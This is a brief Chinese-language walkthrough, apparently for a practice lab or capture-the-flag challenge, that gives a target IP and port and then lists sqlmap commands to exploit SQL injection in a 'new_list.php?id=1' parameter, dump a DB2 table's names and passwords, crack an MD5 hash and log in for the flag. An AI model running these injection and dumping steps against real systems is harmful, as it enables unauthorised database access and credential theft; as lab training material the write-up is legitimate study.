1、IP port(http://124.70.71.251:45287)
2、使用sqlmap查询当前数据库(如需sqlmap,可联系笔者)
python3 sqlmap.py -u "你的IP/new_list.php?id=1" --current-db
3、根据库查表名
python3 sqlmap.py -u "你的IP/new_list.php?id=1" -D DB2INST1 --tables --dump --batch
4、根据表查列名(列名需要猜,这里直接给出列名"name,password")
python3 sqlmap.py -u "你的IP/new_list.php?id=1" -D DB2INST1 -T GAME_CHARACTER -C name,password --dump --batch
5、得到账号密码,chx为禁用用户,我们使用mozhe,密码还需使用MD5解密工具解密,密码为“322548”
6、登录获得KEY